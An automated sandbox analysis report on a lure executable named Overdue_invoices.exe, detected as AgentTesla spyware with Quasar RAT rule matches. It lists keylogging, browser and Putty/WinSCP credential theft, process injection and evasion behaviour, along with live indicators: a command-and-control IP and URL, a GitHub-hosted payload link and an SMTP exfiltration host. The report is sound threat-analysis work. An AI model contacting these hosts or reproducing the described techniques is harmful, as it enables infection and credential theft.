
Analysis Report Overdue_invoices.exe

Overview

General Information

Sample Name: Overdue_invoices.exe
Analysis ID: 344973
MD5: afa35ee8f27c8a6661219bccb198fd9b
SHA1: 8b86a3066a24586bd5d17ce45ce8bd7984079af0
SHA256: 2d2c26b0f3308bda9e00913401761b8b5026edccfbe12bce7a72cd2d324c2f45
Tags: exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
May check the online IP address of the machine
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • Overdue_invoices.exe (PID: 5328 cmdline: 'C:\Users\user\Desktop\Overdue_invoices.exe' MD5: AFA35EE8F27C8A6661219BCCB198FD9B)
    • Overdue_invoices.exe (PID: 6020 cmdline: C:\Users\user\Desktop\Overdue_invoices.exe MD5: AFA35EE8F27C8A6661219BCCB198FD9B)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "", "URL: ": "", "To: ": "", "ByHost: ": "smtp.gmail.com:5874", "Password: ": "", "From: ": ""}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.624606390.0000000000402000.00000040.00000001.sdmp | Quasar_RAT_1 | Detects Quasar RAT | Florian Roth
  • 0x170:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x84:$op2: 00 17 03 1F 20 17 19 15 28
  • 0xb01:$op3: 00 04 03 69 91 1B 40
  • 0x1360:$op3: 00 04 03 69 91 1B 40
00000000.00000002.231170766.0000000003AFD000.00000004.00000001.sdmp | Quasar_RAT_1 | Detects Quasar RAT | Florian Roth
  • 0xff0:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x18810:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x30250:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0xf04:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x18724:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x30164:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x1981:$op3: 00 04 03 69 91 1B 40
  • 0x21e0:$op3: 00 04 03 69 91 1B 40
  • 0x191a1:$op3: 00 04 03 69 91 1B 40
  • 0x19a00:$op3: 00 04 03 69 91 1B 40
  • 0x30be1:$op3: 00 04 03 69 91 1B 40
  • 0x31440:$op3: 00 04 03 69 91 1B 40
Process Memory Space: Overdue_invoices.exe PID: 6020 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.Overdue_invoices.exe.400000.0.unpack | Quasar_RAT_1 | Detects Quasar RAT | Florian Roth
  • 0x370:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x284:$op2: 00 17 03 1F 20 17 19 15 28
  • 0xd01:$op3: 00 04 03 69 91 1B 40
  • 0x1560:$op3: 00 04 03 69 91 1B 40

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: Overdue_invoices.exe.6020.1.memstr | Malware Configuration Extractor: Agenttesla {"Username: ": "", "URL: ": "", "To: ": "", "ByHost: ": "smtp.gmail.com:5874", "Password: ": "", "From: ": ""}
Multi AV Scanner detection for submitted file
Source: Overdue_invoices.exe | ReversingLabs: Detection: 17%

Compliance:

Uses 32bit PE files
Source: Overdue_invoices.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: Overdue_invoices.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Networking:

May check the online IP address of the machine
Source: unknown | DNS query: name: icanhazip.com (2 identical entries)
Source: global traffic | TCP traffic: 192.168.2.3:49736 -> 108.177.119.109:587
Source: global traffic | HTTP traffic detected: GET /base/D87080E8818FCC40A45F948026A84297.html HTTP/1.1  Host: 193.239.147.103  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1  Host: icanhazip.com  Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 193.239.147.103 193.239.147.103
Source: global traffic | TCP traffic: 192.168.2.3:49736 -> 108.177.119.109:587
Source: unknown | TCP traffic detected without corresponding DNS query: 193.239.147.103 (50 identical entries)
Source: global traffic | HTTP traffic detected: GET /base/D87080E8818FCC40A45F948026A84297.html HTTP/1.1  Host: 193.239.147.103  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1  Host: icanhazip.com  Connection: Keep-Alive
    Source: Overdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmpString found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different 
versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
Source: unknown | DNS traffic detected: queries for: raw.githubusercontent.com
Source: Overdue_invoices.exe, 00000000.00000002.230384205.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://193.239.147.103
Source: Overdue_invoices.exe, 00000000.00000002.230384205.00000000028E1000.00000004.00000001.sdmp | String found in binary or memory: http://193.239.147.103/base/D87080E8818FCC40A45F948026A84297.html
Source: Overdue_invoices.exe, 00000001.00000002.626165081.0000000003116000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.625972987.00000000030AF000.00000004.00000001.sdmp | String found in binary or memory: http://bit.ly/icanhazip-faq
Source: Overdue_invoices.exe, 00000001.00000002.625727686.00000000015E5000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: Overdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmp | String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: Overdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmp | String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: Overdue_invoices.exe, 00000001.00000002.626165081.0000000003116000.00000004.00000001.sdmp | String found in binary or memory: http://icanhazip.com
Source: Overdue_invoices.exe, 00000001.00000002.626165081.0000000003116000.00000004.00000001.sdmp | String found in binary or memory: http://icanhazip.com/
Source: Overdue_invoices.exe, 00000001.00000002.625972987.00000000030AF000.00000004.00000001.sdmp | String found in binary or memory: http://icanhazip.com4
Source: Overdue_invoices.exe, 00000001.00000002.625776172.00000000018C6000.00000004.00000040.sdmp | String found in binary or memory: http://ns.adobe.c/g
Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp | String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: Overdue_invoices.exe, 00000000.00000002.230384205.00000000028E1000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.625927186.0000000003081000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Overdue_invoices.exe, 00000001.00000002.626846042.000000000328B000.00000004.00000001.sdmp | String found in binary or memory: http://smtp.gmail.com
Source: Overdue_invoices.exe, 00000001.00000002.625727686.00000000015E5000.00000004.00000020.sdmp | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/
Source: Overdue_invoices.exe, 00000001.00000002.625659765.00000000015AD000.00000004.00000020.sdmp, Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/de-ch/
Source: Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.625516000.0000000001562000.00000004.00000020.sdmp | String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Overdue_invoices.exe, 00000001.00000002.627092072.0000000003391000.00000004.00000001.sdmp | String found in binary or memory: https://accounts.google.com/signin/continue?sarp=1&scc=1&plt=AKgnsbt
Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp | String found in binary or memory: https://cdn.ecosia
Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp | String found in binary or memory: https://duckduckgo.com/chrom
Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp, browserCreditCards.1.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Overdue_invoices.exe, 00000001.00000002.624606390.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://i.imgur.com/9sS1RPE.png
Source: Overdue_invoices.exe, 00000000.00000002.231170766.0000000003AFD000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.624606390.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://mail.google.com
Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp | String found in binary or memory: https://pki.goog/repository/0
Source: Overdue_invoices.exe, 00000001.00000002.626078559.00000000030F0000.00000004.00000001.sdmp | String found in binary or memory: https://raw.githubusercontenP
Source: Overdue_invoices.exe, 00000001.00000002.626846042.000000000328B000.00000004.00000001.sdmp | String found in binary or memory: https://raw.githubusercontenPf~
Source: Overdue_invoices.exe, 00000001.00000002.625927186.0000000003081000.00000004.00000001.sdmp | String found in binary or memory: https://raw.githubusercontent.com
Source: Overdue_invoices.exe, 00000001.00000002.625927186.0000000003081000.00000004.00000001.sdmp | String found in binary or memory: https://raw.githubusercontent.com/pandalog/nothing/master/john.txt
Source: Overdue_invoices.exe, 00000000.00000002.231170766.0000000003AFD000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.624606390.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://raw.githubusercontent.com/pandalog/nothing/master/john.txt)CqbkTHriRRbQjaArtJfFMC#
Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.dr | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.dr | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Overdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: Overdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: Overdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: Overdue_invoices.exe, 00000001.00000002.626663289.0000000003236000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: Overdue_invoices.exe, 00000001.00000002.626044350.00000000030E4000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.627057496.000000000337F000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.627092072.0000000003391000.00000004.00000001.sdmp, Overdue_invoices.exe, 00000001.00000002.626025797.00000000030D4000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/mail/?p=WantAuthError
Source: Overdue_invoices.exe, 00000001.00000002.627092072.0000000003391000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/mail/answer/78754
Source: Overdue_invoices.exe, 00000000.00000002.230153111.0000000000B83000.00000004.00000020.sdmp | String found in binary or memory: https://wa.239.147.103/base/D87080E8818FCC40A45F948026A84297.html
Source: Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/chrome/
Source: Overdue_invoices.exe, 00000001.00000002.625659765.00000000015AD000.00000004.00000020.sdmp | String found in binary or memory: https://www.google.com/chrome/defaLMEM
Source: Overdue_invoices.exe, 00000001.00000002.625727686.00000000015E5000.00000004.00000020.sdmp | String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/chrome/thank-you.html
Source: Overdue_invoices.exe, 00000001.00000002.626238990.0000000003150000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: Overdue_invoices.exe, 00000001.00000002.625727686.00000000015E5000.00000004.00000020.sdmp | String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0binLMEM
Source: Overdue_invoices.exe, 00000001.00000002.630576508.0000000006870000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/Nn
Source: Overdue_invoices.exe, 00000001.00000003.239380951.00000000041CE000.00000004.00000001.sdmp, browserCreditCards.1.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to log keystrokes (.Net Source)
Source: 1.2.Overdue_invoices.exe.400000.0.unpack, NameSpace_Global/Core.cs | .Net Code: SetHook
Installs a global keyboard hook
Source: C:\Users\user\Desktop\Overdue_invoices.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Overdue_invoices.exe

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.624606390.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000000.00000002.231170766.0000000003AFD000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.Overdue_invoices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT Author: Florian Roth
Executable has a suspicious name (potential lure to open the executable)
Source: Overdue_invoices.exe | Static file information: Suspicious name
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: Overdue_invoices.exe
Source: C:\Users\user\Desktop\Overdue_invoices.exe | Code function: 0_2_00AD73B0
Source: C:\Users\user\Desktop\Overdue_invoices.exe | Code function: 0_2_00AD6C38
Source: C:\Users\user\Desktop\Overdue_invoices.exe | Code function: 0_2_00AD5748
Source: C:\Users\user\Desktop\Overdue_invoices.exe | Code function: 1_2_07EF8A38
Source: C:\Users\user\Desktop\Overdue_invoices.exe | Code function: 1_2_07EF3EC0
Source: Overdue_invoices.exe | Binary or memory string: OriginalFilename vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000000.00000002.230410070.000000000290F000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamepanda.exel% vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000000.00000002.230792815.00000000038E9000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSHIT.dll* vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000000.00000000.209905994.0000000000402000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameXDesProc.exeT vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000000.00000002.230130488.0000000000B5A000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Overdue_invoices.exe
Source: Overdue_invoices.exe | Binary or memory string: OriginalFilename vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000001.00000002.629484659.0000000005630000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000001.00000000.225837924.0000000000DB2000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameXDesProc.exeT vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000001.00000002.624689682.000000000041A000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamepanda.exel% vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000001.00000002.629727948.00000000056A0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000001.00000002.625439956.000000000153A000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000001.00000002.630778412.0000000006C30000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Overdue_invoices.exe
Source: Overdue_invoices.exe, 00000001.00000002.624879877.0000000001158000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Overdue_invoices.exe
Source: Overdue_invoices.exe | Binary or memory string: OriginalFilenameXDesProc.exeT vs Overdue_invoices.exe
Source: Overdue_invoices.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
Source: 00000001.00000002.624606390.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.231170766.0000000003AFD000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.Overdue_invoices.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.Overdue_invoices.exe.400000.0.unpack, NameSpace_Global/Core.cs | Base64 encoded string: 'MrE1thusbvL9jUnxf1Lcqml0/hEjxyBHvYQkHfU0e7ZA3dt4j2WOl2OHNkC7kY9pQCzpNPPRj8Y=', 'iMKrIqJC9ZAyLRDh/GZR6J5a0LtY5Iepg2LkeJHYP3LxSJU5ojpXjijfzghF2Psa', 'G8WwiqyHtuMi36fzoXG0WXV3alulUlvJbG26GZ78bQx4lWjg5TCCVQ==', 'MXg5VX5jLbiBy9Cm6tjOR0HiHnsHY5fMkc3wHc95wy56a7HPbHGRobIWKceNtG8f', 'G8WwiqyHtuMi36fzoXG0WXV3alulUlvJbG26GZ78bQx4lWjg5TCCVQ==', 'zSUT/U/UiMfSdmJXIlMFYstwqPXc90mjAAO6NC1KQy6trroQ+1O8lQ=='
Source: 1.2.Overdue_invoices.exe.400000.0.unpack, NameSpace_Global/Sucks.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 1.2.Overdue_invoices.exe.400000.0.unpack, NameSpace_Global/Sucks.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.Overdue_invoices.exe.400000.0.unpack, NameSpace_Global/Core.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 1.2.Overdue_invoices.exe.400000.0.unpack, NameSpace_Global/Core.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/6@4/4
Source: C:\Users\user\Desktop\Overdue_invoices.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Overdue_invoices.exe.log
Source: C:\Users\user\Desktop\Overdue_invoices.exe | Mutant created: \Sessions\1\BaseNamedObjects\KKCDH7XDFH0WWL2TU813
Source: C:\Users\user\Desktop\Overdue_invoices.exe | File created: C:\Users\user\AppData\Local\Temp\TMP_pass
Source: Overdue_invoices.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Overdue_invoices.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll (2 identical entries)
Source: C:\Users\user\Desktop\Overdue_invoices.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Overdue_invoices.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Overdue_invoices.exe | File read: C:\Windows\System32\drivers\etc\hosts (3 identical entries)
    Source: C:\Users\user\Desktop\Overdue_invoices.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Overdue_invoices.exeReversingLabs: Detection: 17%
    Source: unknownProcess created: C:\Users\user\Desktop\Overdue_invoices.exe 'C:\Users\user\Desktop\Overdue_invoices.exe'
    Source: unknownProcess created: C:\Users\user\Desktop\Overdue_invoices.exe C:\Users\user\Desktop\Overdue_invoices.exe
    Source: C:\Users\user\Desktop\Overdue_invoices.exeProcess created: C:\Users\user\Desktop\Overdue_invoices.exe C:\Users\user\Desktop\Overdue_invoices.exeJump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
    Source: C:\Users\user\Desktop\Overdue_invoices.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: Overdue_invoices.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: Overdue_invoices.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

    Data Obfuscation:

    .NET source code contains potential unpacker
    Source: 1.2.Overdue_invoices.exe.400000.0.unpack, NameSpace_Global/Core.cs | .Net Code: OnResolveAssembly System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: C:\Users\user\Desktop\Overdue_invoices.exe | Code function: 0_2_004032DC push 280A0000h; ret 0_2_004032E1
    Source: C:\Users\user\Desktop\Overdue_invoices.exe | Code function: 1_2_00DB32DC push 280A0000h; ret 1_2_00DB32E1
    Source: C:\Users\user\Desktop\Overdue_invoices.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Overdue_invoices.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Users\user\Desktop\Overdue_invoices.exe | Window / User API: threadDelayed 1508
